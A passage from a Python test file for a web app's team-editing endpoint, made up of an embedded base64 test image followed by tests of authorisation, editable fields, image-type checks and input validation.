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
2Q==""")
class TestTeamEdit(Harness):
def test_edit(self):
self.make_team(slug='enterprise', is_approved=True)
edit_data = {
'name': 'Enterprise',
'product_or_service': 'We save galaxies.',
'homepage': 'http://starwars-enterprise.com/',
'image': FileUpload(IMAGE, 'logo.png'),
}
data = json.loads(self.client.POST( '/enterprise/edit/edit.json'
, data=edit_data
, auth_as='picard'
).body)
team = T('enterprise')
assert data == team.to_dict()
assert team.name == 'Enterprise'
assert team.product_or_service == 'We save galaxies.'
assert team.homepage == 'http://starwars-enterprise.com/'
assert team.load_image('original') == IMAGE
def test_edit_supports_partial_updates(self):
self.make_team(slug='enterprise', is_approved=True)
edit_data = {
'product_or_service': 'We save galaxies.',
'homepage': 'http://starwars-enterprise.com/',
'image': FileUpload(IMAGE, 'logo.png'),
}
self.client.POST( '/enterprise/edit/edit.json'
, data=edit_data
, auth_as='picard'
)
team = T('enterprise')
assert team.name == 'The Enterprise'
assert team.product_or_service == 'We save galaxies.'
assert team.homepage == 'http://starwars-enterprise.com/'
assert team.load_image('original') == IMAGE
def test_edit_needs_auth(self):
self.make_team(slug='enterprise', is_approved=True)
response = self.client.PxST( '/enterprise/edit/edit.json'
, data={'name': 'Enterprise'}
)
assert response.code == 401
assert T('enterprise').name == 'The Enterprise'
def test_only_admin_and_owner_can_edit(self):
self.make_participant('alice', claimed_time='now')
self.make_participant('admin', claimed_time='now', is_admin=True)
self.make_team(slug='enterprise', is_approved=True)
response = self.client.PxST( '/enterprise/edit/edit.json'
, data={'name': 'Enterprise'}
, auth_as='alice'
)
assert response.code == 403
assert T('enterprise').name == 'The Enterprise'
response = self.client.POST( '/enterprise/edit/edit.json'
, data={'name': 'Enterprise'}
, auth_as='admin'
)
assert response.code == 200
assert T('enterprise').name == 'Enterprise'
# test_edit() passes => owner can edit
def test_cant_edit_closed_teams(self):
self.make_team(slug='enterprise', is_approved=True)
self.db.run("UPDATE teams SET is_closed = true WHERE slug = 'enterprise'")
response = self.client.PxST( '/enterprise/edit/edit.json'
, data={'name': 'Enterprise'}
, auth_as='picard'
)
assert response.code in (403, 410)
assert T('enterprise').name == 'The Enterprise'
def test_cant_edit_rejected_teams(self):
self.make_team(slug='enterprise', is_approved=False)
response = self.client.PxST( '/enterprise/edit/edit.json'
, data={'name': 'Enterprise'}
, auth_as='picard'
)
assert response.code == 403
assert T('enterprise').name == 'The Enterprise'
def test_can_edit_teams_under_review(self):
self.make_team(slug='enterprise', is_approved=None)
response = self.client.POST( '/enterprise/edit/edit.json'
, data={'name': 'Enterprise'}
, auth_as='picard'
)
assert response.code == 200
assert T('enterprise').name == 'Enterprise'
def test_can_only_edit_allowed_fields(self):
allowed_fields = set(['name', 'image', 'product_or_service', 'homepage'])
team = self.make_team(slug='enterprise', is_approved=None)
fields = vars(team).keys()
fields.remove('onboarding_url') # we are still keeping this in the db for now
for field in fields:
if field not in allowed_fields:
response = self.client.POST( '/enterprise/edit/edit.json'
, data={field: 'foo'}
, auth_as='picard'
)
new_team = T('enterprise')
assert response.code == 200
assert getattr(new_team, field) == getattr(team, field)
def test_edit_accepts_jpeg_and_png(self):
team = self.make_team(slug='enterprise', is_approved=True)
image_types = ['png', 'jpg', 'jpeg']
for i_type in image_types:
team.save_image(original='', large='', small='', image_type='image/png')
data = {'image': FileUpload(IMAGE, 'logo.'+i_type)}
response = self.client.POST( '/enterprise/edit/edit.json'
, data=data
, auth_as='picard'
)
assert response.code == 200
assert team.load_image('original') == IMAGE
def test_edit_with_invalid_image_type_raises_error(self):
team = self.make_team(slug='enterprise', is_approved=True)
invalid_image_types = ['tiff', 'gif', 'bmp', 'svg']
for i_type in invalid_image_types:
data = {'image': FileUpload(IMAGE, 'logo.'+i_type)}
response = self.client.PxST( '/enterprise/edit/edit.json'
, data=data
, auth_as='picard'
)
assert response.code == 400
assert "Please upload a PNG or JPG image." in response.body
assert team.load_image('original') == None
def test_edit_with_empty_values_raises_error(self):
self.make_team(slug='enterprise', is_approved=True)
response = self.client.PxST( '/enterprise/edit/edit.json'
, data={'name': ' '}
, auth_as='picard'
)
assert response.code == 400
assert T('enterprise').name == 'The Enterprise'
def test_edit_with_bad_url_raises_error(self):
self.make_team( slug='enterprise'
, is_approved=True
, homepage='http://starwars-enterprise.com/')
r = self.client.PxST( '/enterprise/edit/edit.json'
, data={'homepage': 'foo'}
